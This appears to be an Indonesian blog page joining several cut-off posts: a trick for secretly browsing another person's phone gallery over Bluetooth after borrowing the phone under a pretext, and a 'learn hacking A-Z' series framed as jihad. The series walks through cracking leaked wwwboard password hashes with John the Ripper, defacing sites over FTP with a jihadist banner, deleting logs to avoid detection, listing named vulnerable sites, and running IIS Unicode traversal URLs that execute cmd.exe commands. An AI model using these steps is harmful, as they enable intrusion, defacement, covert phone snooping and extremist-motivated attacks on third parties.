Mengintip Gallery Hape orang Lain Via Android

Hafidz_ Wow wow santai Bro… hehe.. ini sangat gampang dilakukan, tapi tidak semua sistem HP bisa kita mata-matai… disini kita bisa memamfaatkan kecanggihan dari media transfer data yang disebut bluetooth, sebenarnya saya sudah lama mengetahui hal ini tapi baru kepikiran buat posting sekarang cuz ane lagi kehabisan ide nih..

Oke pertama-tama yang dibutuhkan adalah sebuah aplikasi untuk android yang disebut “Bluetooth File Transfer” Aplikasi ini bisa didapat di Android Market.

Langkah berikutnya adalah buka Aplikasi tersebut, dan lakukan scan Bluetooh,

caranya adalah ketika anda membukanya disitu akan ada beberapa tab anda klik tab yang berlambang bluetooth, kemudian lakukan scan Bluetooh, setelah itu anda konek ke target yang dituju, (Biasanya Hal ini membutuhkan Passwd) tapi kalau bluetooth anda udah dikenali biasanya bisa lebih mudah untuk langsung melakukan koneksi.. jadi caranya anda pinjam dulu hp Target, kemudian anda berlaga mau kirim file penting ato apalah.. nah pada saat minjem itulah anda masukkin paswwd..

So Be fun… Peace Love and have Fun..

Iklan

Belajar Hack A-Z Part 5 (Penjelasan tools & daftar Bugs (Tamat))

PENJELASAN SINGKAT TENTANG PROGRAM-PROGRAM YANG AKAN KITA PAKAI
Irhaby007

Pertama, penjelasan tentang program John The Ripper. Letakkan program ini di drive c: Ingat lo…passwordnya ditaruh di file program, tepatnya di file txt, kasih nama: password. Supaya nanti menjelaskannya enak… Untuk cara mengaktifkan program ini, Antum harus tahu bahwa program ini dioperasikan di DOS. Jadi, silahkan masuk dulu ke DOS, lalu ketik cd.. sehingga nanti keluar tulisan seperti ini: C:\> Setelah itu, tulis john Sekarang, command yang mau dipakai apa aja…

1. Ada command yang berfungsi kemungkinan-kemungkinan kata yang ada pada deretan kata sandi (password). Bentuknya adalah: john –w:wordlist.txt password.txt file wordlist adalah file yang berisi kemungkinan kata dan passwordnya yang masih terselubung. Walaupun, saya tidak menganjurkan menggunakan pilihan ini. Wallôhu A‘lam…

2. Command yang berfungsi untuk mencari kata rahasia yang sesuai dengan username, bentuknya adalah: john –single passwd.txt:

3. Command yang hanya berfungsi mencari nomor saja, bentuknya: john –iD:igit passwd.txt

4. Command yang berfungsi mencari huruf alphabet kecil, bentuknya: john –i:Alpha passwd.txt:

5. Command yang berfungsi untuk mencarikan semua kemungkinan kata buat Antum, bentuknya: john –i:all passwd.txt Ini adalah pilihan terakhit ketika semua usaha gagal, karena pilihan ini sangat panjang tetapi merupakan pilihan terbaik, wallôhu A‘lam… Baik,

sekarang saya sedang bekerja menggunakan pilihan terakhir di atas, program pun berjalan hingga setengah jam, tapi ternyata tidak terjadi apa-apa. Padahal, saya tidak mungkin membiarkan komputer saya hanya mengerjakan satu program saja, lalu apa yang harus saya lakukan? Gampang, sekarang tekanlah ctrl + shift + c atau ctrl + c Lalu, bagaimana supaya saya bisa menyempurnakan pekerjaan ini? Tulis saja –selanjutnya—john-restrore, maka program itu akan menyempurnakan sendiri pekerjaannya… Nah, sekarang untuk percobaan, kita mau menyerang suatu situs, misalnya. Maka, pertama-tama kita coba situs-situs biasa dulu. Jangan langsung situs-situs intelejent salibis seperti Yahoo, salah satunya.

Ini mengingat bahwa menyerang situs-situs biasa itu mudah banget…dengan pertolongan Alloh. Jadi, jangan menyerah akhi dari berjihad dengan cara yang sekarang Alloh hadapkan di depan Antum. Jangan banyak bicara sudah…mari kita mulai bekerja! Program yang wajib ada adalah john the ripper dan WS_FTP pro. Kedua-duanya sudah ada di dalam link yang telah kami sebutkan sebelumnya, berkat anugerah Alloh SWT semata. Bismillah… kita mulai: Sekarang, kami beri Antum situs yang ada bugsnya, kita akan coba menembusnya. Situs itu adalah: http://www.dsg-art.com/ (situs ini sekedar sample saja, dan nampaknya bugs pada situs ini sekarang sudah hilang) Situs ini terkena bugs pada passwordnya, yaitu: wwwboard/passwd.txt Sekarang, kita tembus bugsnya, tulis: http://www.dsg-art.com/wwwboard/passwd.txt Tujuannya apa? Agar username dan passwordnya terlihat. Dan benar, akan muncul seperti ini: jc:GXQ4cN0fhbptw. jc adalah username nya, sedangkan yang berikutnya (GXQ4cN0fhbptw) adalah passwordnya. Seperti yang terlihat, password ini masih samar, lantas bagaimana cara memecahkannya sehingga kita bisa mendapatkan password aslinya? Tentu saja dengan program Jhon The Ripper yang sudah kami sebutkan dan jelaskan di atas. Setelah ketemu, maka sekarang kita telah memperoleh username dan sekaligus password asli dari situs ini. Kalau sudah begini, sudah… aksi hacking berjalan dengan sempurna, semoga Alloh memberkahi Antum semua.

Sekarang kita mau menulis: LA ILAHA ILLALLOH MUHAMMAD ROSULULLOH, SITUS INI TELAH DI-HACK OLEH PASUKAN JIHAD MEDIA, ‘IZZAH ITU HANYA MILIK ALLOH, ROSUL DAN ORANG-ORANG BERIMAN, misalnya. Bagaimana caranya? Tentu saja dengan program WS_FTP pro. Ok…sekarang kita letakkan username dan passwordnya di dalam program ini. Setelah itu, kita telah berhasil memasuki “remote” (pusat pengendali) dari situs ini; kalau Antum pengin meluluh-lantakkan situs, tinggal delete saja semua file, selesai dengan tetap memohon pertolongan kepada Alloh. Dari sekian file, ada file yang namanya index.htm. Seperti telah kami jelaskan, ini adalah nama file dari tampilan utama sebuah situs. Dan tentu saja sudah kita siapkan sebelumnya file lain yang berisi tampilan bertuliskan: LA ILAHA ILLALLOH MUHAMMAD ROSULULLOH, SITUS INI TELAH DI-HACK OLEH PASUKAN JIHAD MEDIA, ‘IZZAH ITU HANYA MILIK ALLOH, ROSUL DAN ORANG-ORANG BERIMAN. Sekarang, tinggal kita delete saja file index.htm situs itu, lalu kita masukkan file yang sudah kita siapkan sebelumnya ini (ingat, nama file baru kita ini harus sama: index.htm, penerj.), setelah kita pastikan letak keberadaan file tersebut dalam komputer.

Sekarang, bergembiralah Antum, dan beri kabar gembira orang lain, dengan bantuan Alloh situs ini berhasil kita hack dan meninggalkan pesan buat pengelolanya: bahwa situs ini sudah di-hack. Dan sebagaimana telah kami jelaskan, agar pemilik situs tidak mendeteksi pelaku serangan ini, kita delete semua file yang berakhiran log, yang alhamdulillah sudah kita jelaskan di atas. Sekarang, setelah membaca penjelasan-penjelasan di atas, siapa saja bisa menyerang situs-situs biasa dan situs-situs yang sistem proteksinya lemah, dengan daya dan kekuatan Alloh. Terakhir, berikut daftar situs-situs yang bisa diserang serta jenis bugsnya. Tapi ingat, sekarang tidak semua bugs dari situs-situs ini masih aktif dan ada, ketika Antum membaca daftar ini. Semoga anugerah Alloh selalu abadi pada diri Antum…

SITUS-SITUS YANG ADA BUGS-NYA:
http://www.efn.org/~dalep/wwwboard/passwd.txt http://www.lionnet.org.tr/118u/wwwboard/passwd.txt http://members.mint.net/raske/wwwboard/passwd.txt http://www.avatar-moving.com/kb/wwwboard/passwd.txt http://espa.virtualave.net/wwwboard/passwd.txt Baca lebih lanjut

Hacker Cantik dari Negeri China

VIVAnews – Google baru-baru ini menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Alasannya, raksasa mesin pencari itu sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri tirai bambu tersebut.
 David Drummond, Senior Vice President, Corporate Development and Chief Legal Officer Google menyebutkan, pihaknya mendapati adanya ‘serangan yang sangat canggih’ yang berasal dari China terhadap infrastuktur Google.
“Serangan-serangan ini membuat kami memutuskan untuk meninjau kelayakan operasi bisnis kami di China,” sebut Drummond blog resmi Google, 12 Januari 2010.
Langkah Google yang memilih mundur dari China menunjukkan dahsyatnya komunitas hacker di negeri tersebut.
 Sampai Juli 2008, diperkirakan terdapat 4 juta orang hacker yang tergabung dalam berbagai komunitas hacker. Salah satunya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team.
Kelompok hacker ini dipimpin oleh gadis kelahiran Hunan, 6 September 1989 bernama Xiao Tian.
Dalam benak, kita mungkin membayangkan bahwa tipikal seorang hacker adalah remaja yang beranjak dewasa, dengan penampilan seadanya – kalau tidak dibilang buruk rupa – dengan kacamata tebal, perokok berat, rambut acak-acakan tak terawat dan jarang mandi karena menghabiskan sebagian besar hidupnya di depan komputer.
Ternyata tidak demikian dengan Xiao Tian. Meski menyebutkan ia sering begadang dan sesekali merokok, tetapi Baca lebih lanjut

Belajar Hacker A-Z Part 3 (Mamfaatkan IIS Bugs)

CARA MEMANFAATKAN IIS BUGS LEBIH DARI SATU CARA:
Irhaby007

(Lanjutan dari Part 2)
Bugs-bugs IIS bisa langsung kita praktekkan melalui explorer dengan memanfaatkan file cmd.exe agar semua perintah (command) yang kita minta terlaksana.

CONTOH BUGS INI DAN APLIKASI COMMAND:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

COMMAND UNTUK MEMBUAT PENUNJUK BARU:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ

COMMAND UNTUK MEN-DELETE PETUNJUK:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ

COMMAND UNTUK MENG-COPY:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

COMMAND UNTUK MENGHAPUS:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp

COMMAND UNTUK ME-RENAME FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
COMMAND UNTUK MELIHAT ISI FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm

COMMAND UNTUK MENULISKAN SESUATU DALAM FILE APA SAJA:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt

INGAT: Kadang kita perlu merubah nama petunjuk (exentition) menjadi: msadc, scripts, _vit_admin, iisadmpwd, _vti_bin, cgi-bin, .samples.

SEKARANG, UNTUK MERUBAH TAMPILAN AWAL (HOME) SEBUAH SITUS, MAKA HARUS:

• Menuliskan sesuatu pada Home dengan menggunakan perintah echo
• Meng-apload tampilan buatan Antum melalui program TFTP
• Menuliskan sesuatu pada file Home sebuah situs (file: index.html) adalah menggunakan command echo.

Sebagai dasar, Antum harus terlebih dahulu meng-copy file cmd.exe ke folder scripts, caranya seperti ini –sekedar contoh saja:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

Nah, setelah meng-copy file ini, selanjutnya bisa dilakukan pemeriksaan terhadap bugs lain yang ada di situs tersebut, caranya:
http://www.xxx.com/scripts/DJ.exe/c+dir+c:

Setelah itu, command echo baru bisa dijalankan, caranya adalah:
http://www.xxx.com/scripts/DJ.exe?/…hackermail.com+>+c:inetpubwwwrootindex.htm

CATATAN PENTING:
File indeks utama sebuah situs tidak selalunya bernama index.htm, bisa saja namanya: default.html, index.html, default.asp, default.htm. Jadi, pastikan dulu nama file indeksnya.
Tapi, biasanya index.htm lah yang sering dipakai. Ada kemungkinan Baca lebih lanjut

Belajar Hacker A-Z Part 2 (langkah-langkah)

LANGKAH MELAKUKAN HACKING
irhaby007
(lanjutan dari Part 1)
Akhi karim… sebelum kita melanjutkan pembahasan ini secara lebih dalam, Antum harus catat bahwa langkah nge-hack yang akan kami jelaskan berikut ini hanya satu dari sekian cara yang banyak, dan bisa jadi langkah ini sudah tidak up to date.

Tapi yang penting, yang harus Antum ketahui di sini adalah, bagaimana sih melakukan hack secara umum? Bagaimana Antum tahu cara mencari bugs dari sistem-sistem,
kemudian bagaimana cara memanfaatkan bugs tersebut. Dengan mengetahuinya, atas pertolongan Alloh akan membantu maksud mulia kita.

Langkah pertama dalam hacking adalah mengumpulkan data. Artinya, dalam suatu situs, kita harus tahu web servernya, sistem operasinya apa, dan program bantu apa saja yang dipakai. Misalnya, kita sekarang menghadapi sebuah situs. Nah, kemudian, bagaimana caranya agar kita bisa mengetahui sistem operasinya, Baca lebih lanjut

Belajar Hacker A-Z Part 1 (istilah-istilah)

Kalian tidak akan bisa jadi hacker sejati dalam sehari semalam.
Juga, hacker sejati bukanlah mereka yang main pake program bikinan orang. Hacker sejati adalah yang bisa memunculkan berbagai penemuan baru.
Sebab, keberhasilan yang berhasil dicapai seorang hacker, siapa pun orangnya, tetap saja keberhasilan itu dinisbatkan kepada si penemu program.
Jadi bisa saja apa buah karya hacker lain menjadi terkenal manakala program yang ia rancang sampai ke tangan semua orang. Padahal, ini belum berbicara kemungkinan si hacker pembuat program yang kamu pakai menyisipkan celah-celah yang memungkinkan dia meng-hack komputer kamu ketika kamu menggunakan program tersebut.

ISTILAH-ISTILAH DASAR:
irhaby007

1. TEL-NET
Ini adalah program berukuran kecil yang ada di sistem operasi windows. Dengan menguasai program ini, kita bisa melakukan koneksi dengan server atau operator dan melakukan aksi apa pun sesuai dengan tingkat penguasaan. Biasanya, hacker memakai Tel-net untuk mengetahui cara mengaktifkan sebuah situs, berikut server yang digunakan, kemudian melakukan koneksi dengan port tertentu –khususnya port FTP— untuk bisa menyusup ke situs yang akan diserang secara sembunyi-sembunyi, sehingga bisa membaca file-file situs tersebut dan Baca lebih lanjut